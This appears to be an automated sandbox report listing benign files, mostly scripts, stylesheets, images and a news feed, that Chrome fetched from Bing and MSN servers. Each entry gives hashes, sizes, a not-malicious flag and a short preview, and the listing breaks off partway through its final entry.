                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (19627)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):19674
                                                                                                                                                                                                                                                                        Entropy (8bit):5.345295318503648
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:nmr5RNUVsjzNZPqdwJ9Lxi18x0SYMMygvqXUGJHdQqQXscYEUt0vdri75tZXKQt+:nmr76VSzNZPqSJ9LxiKOrMfgSXUGJHux
                                                                                                                                                                                                                                                                        MD5:6A57E4ACAE2D82619AD37056E8DE818A
                                                                                                                                                                                                                                                                        SHA1:10845130B44263A871D825CAEE336B4B096E74F7
                                                                                                                                                                                                                                                                        SHA-256:92E6A2AE0DE1410B072A98D819EB590B3BEB6A7E8BFF47F9F86213CD56102E53
                                                                                                                                                                                                                                                                        SHA-512:0A4E502DA6AD32A7C4A1BF0904E7C7C4143E67ADFFF572F7066606A7A34E8A19E91F392A29E6559654B54C353F63ECF32353AA0BBCA297191E321E96E0B35438
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/widget-initializer.js
                                                                                                                                                                                                                                                                        Preview:var t,e={d:(t,n)=>{for(var r in n)e.o(n,r)&&!e.o(t,r)&&Object.defineProperty(t,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e)},n={};function r(t,e,n,r){return new(n||(n=Promise))((function(i,o){function s(t){try{c(r.next(t))}catch(t){o(t)}}function a(t){try{c(r.throw(t))}catch(t){o(t)}}function c(t){var e;t.done?i(t.value):(e=t.value,e instanceof n?e:new n((function(t){t(e)}))).then(s,a)}c((r=r.apply(t,e||[])).next())}))}function i(t,e){window.dispatchEvent(new CustomEvent(t,{bubbles:!0,cancelable:!0,composed:!0,detail:{type:"AppError",payload:e}}))}function o(){return!("undefined"==typeof window||!window.document||!window.document.createElement||window.isRenderServiceEnv)}function s(t,e=null,n=null){return e&&e.length>0?e:"windowsNewsPlus"===t||"winWidgets"===t?n&&n.includes("query=enterprise")?"entwindowsdash":"windowsdash":t}let a,c,u,l;function d(t,e){if(t&&(c=t),e&&(u=e),!l){const{connection:t={},deviceMemory:e="",hardwareConcurrency:n}=window.navi
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 414 x 32, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):2144
                                                                                                                                                                                                                                                                        Entropy (8bit):7.603445614854898
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:Wt2dMFbpombbd4x5k01228Qzim0XOgJbxQuvyCoQjm:Ldc1omvd4x5k0V8uH0+gZxQ8yCocm
                                                                                                                                                                                                                                                                        MD5:67E0BE8B32F82EBAA6F07A2383C25F13
                                                                                                                                                                                                                                                                        SHA1:D5B4BAE8B70AC9D6E3C3AC673546957CCB719618
                                                                                                                                                                                                                                                                        SHA-256:4CC6C20061A8027BF45B02982830F5760BC6F65D0A0DE75094BC90245C287548
                                                                                                                                                                                                                                                                        SHA-512:54C558D486C71882E11B11DE566738949E97BEF3EC12050213FEE48BE033E981C32B7C64F2057D74D232FEB778A959C52781759BF48938F4F6B4BD0E88F68ACC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/rp/1bS66LcKydbjw6xnNUaVfMtxlhg.png
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR....... .........../PLTE..............................................................................................................................fff.....................................................................................................................................................................................ctRNS.0.@..`.... ...Pp...U......}J%.._*..3.........IWo..K..H..,.......mCA.|..`......]............e.#?....}IDATx^.ws.8...&D.`......\..\z..\........#i.%.......WD.0..a.X@....3.c..vH....P.t..-.n..$..$4.%lJ>.EIM...*..<..o.I..(.k\DsQaFE....Q.....66.0#..7.@..I3...R*_..;......@=1......[;*...r...1..I.Z(..(.0p....&Q..00.h-...t.......|%..\".:.e0....K...`c.{o.X.... I..e..y@N.........B.6.J....&...P#.:...m...g.+.....>........<6G.`.;.$..$.6.!..__@..1.1...1G]..'.G.G..!..%<D.{...`....m.c+z......AE>.5.5..D."..(.;..1.[....,Z.<......c_.5..>...NS.|......l8.Z..c!=l..g......a'...W#....w......W..s.|y....&&*.. p.........K.rD.8.%p-I.[.v.Cg.G.g..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (1587), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1589
                                                                                                                                                                                                                                                                        Entropy (8bit):5.24528911504239
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:KyskFELbJnSYVtXpQyL93NzpGaQJWA6vrIhf7:KybibJnSE5aU93HGaQJWAiIh
                                                                                                                                                                                                                                                                        MD5:CB027BA6EB6DD3F033C02183B9423995
                                                                                                                                                                                                                                                                        SHA1:368E7121931587D29D988E1B8CB0FDA785E5D18B
                                                                                                                                                                                                                                                                        SHA-256:04A007926A68BB33E36202EB27F53882AF7FD009C1EC3AD7177FBA380A5FB96F
                                                                                                                                                                                                                                                                        SHA-512:6A575205C83B1FC3BFAC164828FBDB3A25EAD355A6071B7D443C0F8AB5796FE2601C48946C2E4C9915E08AD14106B4A01D2FCD534D50EA51C4BC88879D8BEC8D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/No5xIZMVh9KdmI4bjLD9p4Xl0Ys.js
                                                                                                                                                                                                                                                                        Preview:var wln=wln||"",Identity;(function(n){function i(n){n.style.display="none";n.setAttribute("aria-hidden","true")}function r(n){n.style.display="inline-block";n.setAttribute("aria-hidden","false")}var u,t;n&&n.sglid&&n.setLoginPreference&&sj_be&&sj_cook&&sj_evt&&_d&&typeof _d.querySelectorAll!="undefined"&&(u=function(n){var i=n.getAttribute("data-a"),t=n.getAttribute("data-p");i==="false"&&t!=null&&sj_be(n,"click",function(){sj_cook.set("SRCHUSR","POEX",t,!0,"/")})},sj_evt.bind("identityHeaderShown",function(){var n=!1;sj_be(_ge("id_l"),"click",function(){var i,t;if(!n){for(i=_d.querySelectorAll(".b_imi"),t=0;t<i.length;t++)u(i[t]);n=!0}})},!0));sj_evt&&n&&(t=function(t){var h;if(t==null||t.idp!=="orgid"||(h=n.wlProfile(),h==null||h.name==null||t.name!=null)){var e=_ge("id_n"),u=_ge("id_p"),o=_ge("id_s"),s=_ge("id_a"),f=t?t.displayName:wln,c=t?t.img:null,l=t?t.idp:null,a=t?t.cid:null;e&&s&&(a||f)?(u&&c&&(u.title=f,u.src=c,r(u)),f.length>10&&(f=f.substring(0,10).replace(/\s+$/,"")+".")
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1040
                                                                                                                                                                                                                                                                        Entropy (8bit):4.906475176292464
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:t3JfDuJSMMg7cO4PRgASiFL9PddDSYXIzfpMhg4BLy+K5bHxpGlG8O:30cZPRdx3n9vLvK5bHac8O
                                                                                                                                                                                                                                                                        MD5:7EAFCE495848D8F8805487DA7F6C17E8
                                                                                                                                                                                                                                                                        SHA1:D14E7BE4F3BA3860F9292B6E1FE1EE6B432945F6
                                                                                                                                                                                                                                                                        SHA-256:B6F9A9A7FD5FAD7452F972E26119B4A2180E6E28681C4CA77F3D49A9DCB3A151
                                                                                                                                                                                                                                                                        SHA-512:A7D4A78E6C1DC8BAB9B86C099417E1AC2CC6581A7F99780ACCAC2A79F5D5FAEEBA514A61B3BEB34A8BAE6C4B3CC67A8580F4506ABB0817DC7DB3499464827DF3
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:<svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">.. <path fill-rule="evenodd" clip-rule="evenodd" d="M13.6505 1.15573C13.6203 0.625918 13.191 0.206607 12.6606 0.188891L7.86533 0.0287154C7.57733 0.0190956 7.29857 0.131052 7.09722 0.337199L0.313162 7.28308C-0.0826965 7.68838 -0.0750412 8.33785 0.33026 8.7337L5.39872 13.6841C5.80402 14.0799 6.45349 14.0723 6.84935 13.667L13.6334 6.72108C13.8348 6.51493 13.9401 6.2336 13.9237 5.94591L13.6505 1.15573ZM11.0542 3.19839C11.3347 3.47234 11.7842 3.46704 12.0581 3.18655C12.3321 2.90607 12.3268 2.4566 12.0463 2.18265C11.7658 1.9087 11.3163 1.914 11.0424 2.19449C10.7684 2.47497 10.7737 2.92443 11.0542 3.19839Z" fill="url(#paint0_linear_9629_1325)"/>.. <defs>.. <linearGradient id="paint0_linear_9629_1325" x1="4.94694" y1="13.487" x2="0.000210146" y2="3.39805" gradientUnits="userSpaceOnUse">.. <stop stop-color="#4464FF"/>.. <stop offset="1" stop-color="#44B0FF"/>..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (21819)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):21850
                                                                                                                                                                                                                                                                        Entropy (8bit):5.354090222291205
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:Kh4kT1lYxfiWahKMpWMEVhbTDDoFWZ3BnqIfP5IDV6s4RKAwKXvUNuw+0TVteAaV:Y5TifxbBpBnqIH+Z6sepXv0uAaV
                                                                                                                                                                                                                                                                        MD5:30280C218D3CAAF6B04EC8C6F906E190
                                                                                                                                                                                                                                                                        SHA1:653D368EFDD498CAF65677E1D54F03DD18B026B5
                                                                                                                                                                                                                                                                        SHA-256:D313C6FFF97701CC24DB9D84C8B0643CA7A82A01C0868517E6E543779985C46E
                                                                                                                                                                                                                                                                        SHA-512:1F329898FA0E68F65095B813CA20351ACFEAA5F74DB886508FD4F1FA85811A8CC683C6FAB9D9F094F596C8957219F8E29A6307EA0B2D470BDC809A4B9C9D34DC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:/*!DisableJavascriptProfiler*/.var BM=BM||{};BM.config={B:{timeout:250,delay:750,maxUrlLength:300,sendlimit:20,maxPayloadSize:14e3},V:{distance:20},N:{maxUrlLength:300},E:{buffer:30,timeout:5e3,maxUrlLength:300},C:{distance:10}},function(n){function vt(){if(!document.querySelector||!document.querySelectorAll){k({FN:"init",S:"QuerySelector"});return}w={};e=[];ft=1;ut=0;rt=0;o=[];s=0;h=!1;var n=Math.floor(Math.random()*1e4).toString(36);t={P:{C:0,N:0,I:n,S:ei,M:r,T:0,K:r,F:0}};pi()}function oi(n,t){var r={};for(var i in n)i.indexOf("_")!==0&&(i in t&&(n[i]!==t[i]||i==="i")?(r[i]=t[i],n[i]=t[i]):r[i]=null);return r}function si(n){var i={};for(var t in n)n.hasOwnProperty(t)&&(i[t]=n[t]);return i}function b(n,t,r,u){if(!h){k({FN:"snapshot",S:n});return}r=r||ni;t=t||!1;var f=g()+r;ot(o,n)===-1&&o.push(n);t?(yt(),pt(t,u)):f>s&&(yt(),rt=sb_st(pt,r),s=f)}function k(n){var u={T:"CI.BoxModelError",FID:"CI",Name:ht,SV:ct,P:t&&"P"in t?d(t.P):r,TS:f(),ST:v},i,e;for(i in n)u[i]=n[i];e=d(u);wt(e)}func
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):17656
                                                                                                                                                                                                                                                                        Entropy (8bit):7.9577659896773065
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:ewyvV8iKwyrEjQWVIbQEwewq2oWd5jX/xAzFF5dR:ewCVbryrSUQvLq5Wdh/izX5dR
                                                                                                                                                                                                                                                                        MD5:DAF2D12E907865610DF30208030683AD
                                                                                                                                                                                                                                                                        SHA1:25AEC3492C6EE6B7661EAD296F594A3CA01D3663
                                                                                                                                                                                                                                                                        SHA-256:D2132E8C9EA601D2B388CB9AE0D2A174855BC094FBF6D8E7E4414711E6290446
                                                                                                                                                                                                                                                                        SHA-512:FCED2FCF096ABEB3A504B31B4696BA7395C9853047CF17C1B05129C2B5B266BAD8D26FC59808F8A1C5D91FC0747BDFABF9F9EFDC9EEBD1DD97F44AF34008D794
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..o..+q ..m..9..!..^......?.u.=......kD}v.I.N..Z.l.0t.+..8...d`8.~..1Z.....UG..4..%..T.7;cZ4.4.=;....n..|.....%..3\.<s=..........MJ@.....m..9.V.j..}....S'.I.j6..X...,..<..+'P...X..V..(.O.kN.......].....cR.{......}kzp<l]k..|d7.O.s..w...kk.M4..E......j.z.3np..=...._...{..%.m....ZO...x.E.....Fq]~.4..<yRu%..~.....gk....M.........8$t2.H......U...kF.B...@8....+.(...y
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (11012)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):54506
                                                                                                                                                                                                                                                                        Entropy (8bit):5.412530374899776
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:MxNqYV6qLWepUD4Pax62tVQf8wlXENvsL3OTdTu2ENpW/d6RVLue3oXXSev:fsTLHUQfvI7aXvuXH
                                                                                                                                                                                                                                                                        MD5:7BAAF7DB14A9C12211062C3B879B9BB6
                                                                                                                                                                                                                                                                        SHA1:21EDB37B438431E8F6B2B3A8CCD2FA6572276E3F
                                                                                                                                                                                                                                                                        SHA-256:1D1257463FC9CD415D4FA976D12D039F3A37BDF5D8841772EF44F9A9084D6424
                                                                                                                                                                                                                                                                        SHA-512:2B173747115CE6F9820CAC5029E4AFF0B6719DA3DC1A6D8B49D8A1673F80018B3E5867EEE6A12E4D0CBCF41B967F2EDF7E1260E8D835BECFF003D899DB724379
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/weather-legacy-card.e1f088bd2f84117f1069.js
                                                                                                                                                                                                                                                                        Preview:(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["weather-legacy-card"],{74037:function(e,t){"use strict";t.Z='<svg width="14" height="15" viewBox="0 0 12 8"><path d="m11.25.8.53.52-5.9 5.89L0 1.3.53.8l5.36 5.36L11.25.8Z"/></svg>'},52468:function(e,t,a){"use strict";a.d(t,{a:function(){return g}});var i=a(33940),o=a(75155),n=a(99452),r=a(83227),l=a(38156),s=a(65135),d=a(60483),c=a(3900),h=a(987),p=a(98304);class g extends o.l{constructor(){super(...arguments),this.clickBannerWithin7days=!1,this.showBannerTwiceWithin7days=!1,this.sdCardMaskVisible=!0,this.showInitialBanner=!1,this.showContextualFeedback=!1,this.showThankBanner=!1,this.loadFeedbackLinkWCE=!1}experienceConnected(){this.telemetryObject=new d.D({name:"SdCardMask"+this.cardType,action:l.Aw.Click,behavior:l.wu.View,content:{headline:this.cardType}}),this.sdCardMaskVisible=!g.visited.has(this.cardType),this.generateTelemetryTags(),this.isProng2Widget="prong2"===this.config.sc
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1248
                                                                                                                                                                                                                                                                        Entropy (8bit):4.794006986210145
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7FKUjCpiCOvfHhAqbCqzald1uVyjq0nc91fSn62gg:INvfygBQdggWuM1qdg
                                                                                                                                                                                                                                                                        MD5:4CA14D11E247672836C5BF5C1D7BC0B8
                                                                                                                                                                                                                                                                        SHA1:7AB5A1DA7702D2413FF7AA69E900EA0CD61B85F2
                                                                                                                                                                                                                                                                        SHA-256:9CDCCFE1364E044C501EBAFFAC0E46F04309AA8FB8E647000784238B49E64273
                                                                                                                                                                                                                                                                        SHA-512:17C2E87F1EEFD769B6270CBC27022C998EF30A595AB01331A056ABBBB3C517A2BA6CF9116C3F82FCA10C6F92D5434C0DEB94DBAF9AA09A84EA150A8D40B459A4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAywOab.img?w=16&h=16&q=100&m=6&f=png&u=t
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+.....2IDATx...]H.Q...m..6.m"Y..-..3...%TDb..B..E.MaHA....(.D."*....]...t..u......>..2t..].0[.o.9.{.....?..[>.......f..rN].G....s............C&I...".....w.(..\.BF..Mu.t...;.z..l...$=r. .HH6.-". ..<.^/..[.q....Cm..,..+...c.......1.sGj.u.^W"U.8.....Q*....|.U.k1.u.u..m.cX\4.8.....N......o0.....D.~q`....].K..F.._.i^6[..(..$K..]...;,).gz.`$....GO...:./........A8.J'..Ymgn..Ki....P.!*....K\f.p[...v..E.O...7]!H.....5+....$Z...Y.0.w....+..V..j5.?yY.E`kf....fRd<.....+.....D..&..........pv.)3F.....=...9'C.{.R..7.aL.~.%K.}../..9}~._c.`...2...&...}....IEND.B`.........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x304, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1786
                                                                                                                                                                                                                                                                        Entropy (8bit):7.285156263189152
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:fiLEltccCet6dvBdT1QjjICm7XdHqgqWmeBqRsmuKGXp+T1pxcJlTbdP6:3Hgd5GjICYhmwqemuKG21/uTbdi
                                                                                                                                                                                                                                                                        MD5:72AC53C918F35A73809317EC46E28594
                                                                                                                                                                                                                                                                        SHA1:160C2B05107CD63E081995D13F96A4C31727244C
                                                                                                                                                                                                                                                                        SHA-256:5ED68039383EB61A753F134004392C513C7BD20BC1C2328D571BD3DB650C1BE4
                                                                                                                                                                                                                                                                        SHA-512:988F81B7A4A11F9FFEB6F4C269A607DAFFDDB7D6B126B5811EBAB69BFCBC7F7333D43F76EE1B7A6FEDCE64CCB1FF014B3870D52B75B69ACB49C2A832BA4D9BD8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............0.,.."..........h.................................................!..1A..............................................!1............?..O___.N.}{......m@<~....V...C....*@.P.4S.(.."..Q..T%lE5b>.j.&..0^.I.....@C....P..$T.*DS.r....#...?+../n..w%sH.f...........0RP.....E5.*.E#..h.*...&..H..H....0..*....2..*DQ.....*A..."...DQ".%FT.\......;....X..** ".V.....*.&.4.(.Q.Qi.eL.*..&4.T..k.......q..R..d8...N*+."..r\s.dvO8.?0...9.D``.B.)...5$.3%...@qq+..P.6T.%P..DF..3%DUE&).JJ.\\g..W.^|3...u.#.X..?.......zyW.....!....~ZhS.L..F...&...."...2.E8.4.q.q.Y..T\D\....U*!H.4.3R+H.........7...i:b.i...E.y.W......Yu..jq...HS.8.dq...`.F,5.*..D.#HhP...j*..8...EZ.f.A.^..r.U....+C.z.^.Y......yW...4...g.b..1......[Jz.OY..7k.F.EQ..R..Q.".T.....R.4(U.Vj.U..g...T......V2.T..NVzz..U...............&.ZN..f.....g.....OX..5..:.@.....f.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):239788
                                                                                                                                                                                                                                                                        Entropy (8bit):6.0512516137169925
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:lU6lXelzhnwcD+VNpQi0jbIs9iE8aFickjj7kG+NFuckpj7kG+g8R9EvPG0GRCcA:lU6V2W89jbIs9iE8aFickjj7kG+NFucY
                                                                                                                                                                                                                                                                        MD5:2EED513D341865A4AF3982A1BF2FBF16
                                                                                                                                                                                                                                                                        SHA1:EB00DDF344DFAE3B31AB19C497B383A52591C5D6
                                                                                                                                                                                                                                                                        SHA-256:4DF0522D237C3D1545C27522DD06F6E21410799B068DD8748FF8072C32C2A810
                                                                                                                                                                                                                                                                        SHA-512:ED742FFD83553469610ED70B144178FC07DCD21E4600BDDE05F4AAF0DA735DB44269DE4BE0A4EAC18D7CF4FAE26FD5ECFEE3CAE9871A3D0813DA3EA62FBAA3FC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/6wDd80TfrjsxqxnEl7ODpSWRxdY.css
                                                                                                                                                                                                                                                                        Preview:.scopes{color:rgba(255,255,255,.8);display:inline-block;left:0;white-space:nowrap;list-style:none;line-height:39px}.scopes.sc_hide{display:none}.scopes .customIcon{display:flex;align-items:center}.scopes .customIcon .icon{height:16px;width:16px;padding-right:8px}.scopes .customIcon .icon .rms_img{display:block;margin-top:1px}.scopes .scope{font-size:.8125rem;cursor:pointer;vertical-align:middle;margin-right:36px;background-repeat:no-repeat;position:relative;display:inline-block}.scopes .scope:hover,.scopes .scope.focusin{color:#fff}.scopes .scope:hover .overflow_menu,.scopes .scope.focusin .overflow_menu{transform:none;display:block}.scopes .scope a,.scopes .scope .footer .items .item .a_bold,.footer .items .item .scopes .scope .a_bold{color:inherit;cursor:pointer;text-decoration:none}.scopes .scope.dots{margin-bottom:8px;font-weight:bold}.scopes .scope.dots:before{display:inline-block;content:'. . .'}.scopes .scope.dots.hover_focus:focus{outline:none}.scopes .scope .overflow_menu{colo
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65503), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):274599
                                                                                                                                                                                                                                                                        Entropy (8bit):5.423372378721166
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:v6Cn88k1kAcD4Hx2mUa/Q/HabQ7JVmoAK:v7nRDEUa4/HaMmoAK
                                                                                                                                                                                                                                                                        MD5:0768D10168E76CCB3783C98CEF1CF131
                                                                                                                                                                                                                                                                        SHA1:FC2C4494AD0654A9DE8DD5A5683200718C00CA88
                                                                                                                                                                                                                                                                        SHA-256:C2EA6B3DFADD6BE072A3F31D6BEC41952C6C0B01480BA953FB095B6116EC626B
                                                                                                                                                                                                                                                                        SHA-512:12278F1C0B6E056EC9E761E0375C8194939BA5EF1CECD58B01FD3CBC1AC37878DCC6E7761DF79C9CE2BB0DE6632B87456FA45A59418BD80A3C72B4A2FD07BA9F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/service/news/feed/pages/binghp?activityId=FC269871-C66B-4E96-BCF3-A1792D2AB208&apikey=QMmdky7jrTlM4mWJmMYQTi71lp678KyZJBKHCAyKCg&cm=en-us&it=app&ocid=bingHomepage-newsfeed&timeOut=2000&user=m-3D5809546E8E606F1D921A8B6F3E6124&wpopageid=wpoads
                                                                                                                                                                                                                                                                        Preview:{"nextPageUrl":"https://api.msn.com/news/feed/pages/binghp?activityId=FC269871-C66B-4E96-BCF3-A1792D2AB208&timeOut=2000&ocid=bingHomepage-newsfeed&apikey=QMmdky7jrTlM4mWJmMYQTi71lp678KyZJBKHCAyKCg&cm=en-us&User=m-3303A6C30AA96FC73A26B51C0B306E84&newsSkip=31&$skip=1&wpoCmsAdServed=0&wpoNativeAdServed=0&cardsServed=22&renderedSegments=34817&wpopageid=wpoads","sections":[{"dataTemplate":"windows-homepage-top-section-two-segment","layoutTemplate":"windows-homepage-top-section-two-segment","cards":[{"type":"topStories","isLocalContent":false,"galleryItemCount":0,"subCards":[{"id":"AA1l3xDB","type":"article","title":"Hospitals in southern Gaza are at 'breaking point,' international organizations say","abstract":"Two international organizations say hospitals in southern Gaza are at a \"breaking point\" with wards overwhelmed with patients.","readTimeMin":3,"url":"https://www.msn.com/en-us/health/other/hospitals-in-southern-gaza-are-at-breaking-point-international-organizations-say/ar-AA1l3xDB
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (520), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):520
                                                                                                                                                                                                                                                                        Entropy (8bit):5.271876799734874
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:hc2AcSdEcvZswcAIly1YkOcAwI98NyeTg2TQHYN:hc2AcSSwDcr98XhuYN
                                                                                                                                                                                                                                                                        MD5:F03CFEE55A7F1E0B91DD062A5654FC3D
                                                                                                                                                                                                                                                                        SHA1:57D2DB8B8AC66A403E3A3C1C2DCA21E63AF5CDF6
                                                                                                                                                                                                                                                                        SHA-256:39477BAE95EE7073936851A67106A42F585454EBD6C4FEADEACC818C52DA49A4
                                                                                                                                                                                                                                                                        SHA-512:7E66C667FD3F0B1C91296011D7E382776F12905F12C25CCAD4710459FA1E595D2D4A3626C3E969AC1B1575ADD0839EC09CE211B59C694FDBB34D7E5F6D3A5950
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rs/79/x4/nj/V9Lbi4rGakA-OjwcLcoh5jr1zfY.js?or=w
                                                                                                                                                                                                                                                                        Preview:var sj_rra=function(n){var i="/rewardsapp/reportActivity",u=_w.location.search.substring(1),r=window.data_iid,t,f;i+=r&&r.length>0?"?IG="+_G.IG+"&IID="+r+"&"+u:"?"+u;_w._H&&_w._H.mkt&&(i+="&src=hp");t=sj_gx();f="url="+escape(n)+"&V=web";t.open("POST",i,!0);t.setRequestHeader("Content-type","application/x-www-form-urlencoded");t.onreadystatechange=function(){t&&t.readyState==4&&t.status==200&&t.responseText&&_w.sj_appHTML&&(sj_appHTML(sj_b,t.responseText),sj_evt&&sj_evt.fire("serpThemeUpdatedByRewards"))};t.send(f)}
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (64723)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):217171
                                                                                                                                                                                                                                                                        Entropy (8bit):5.516547549800321
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:ECAFYoK3+LLND6Ok/IxNs0Drpgrmyv0ESXwU0L:ECAF23AhD6OsIxuv0ESX1m
                                                                                                                                                                                                                                                                        MD5:FECBD69C0CB18FDD8F8918AD9C34363C
                                                                                                                                                                                                                                                                        SHA1:3E99FF6122CD72B585BF641C672084591747212F
                                                                                                                                                                                                                                                                        SHA-256:4CF6DD6B6EBD9F51817C4A8C4F2678D714C02E8CCDE06974B39D050FCD008C7F
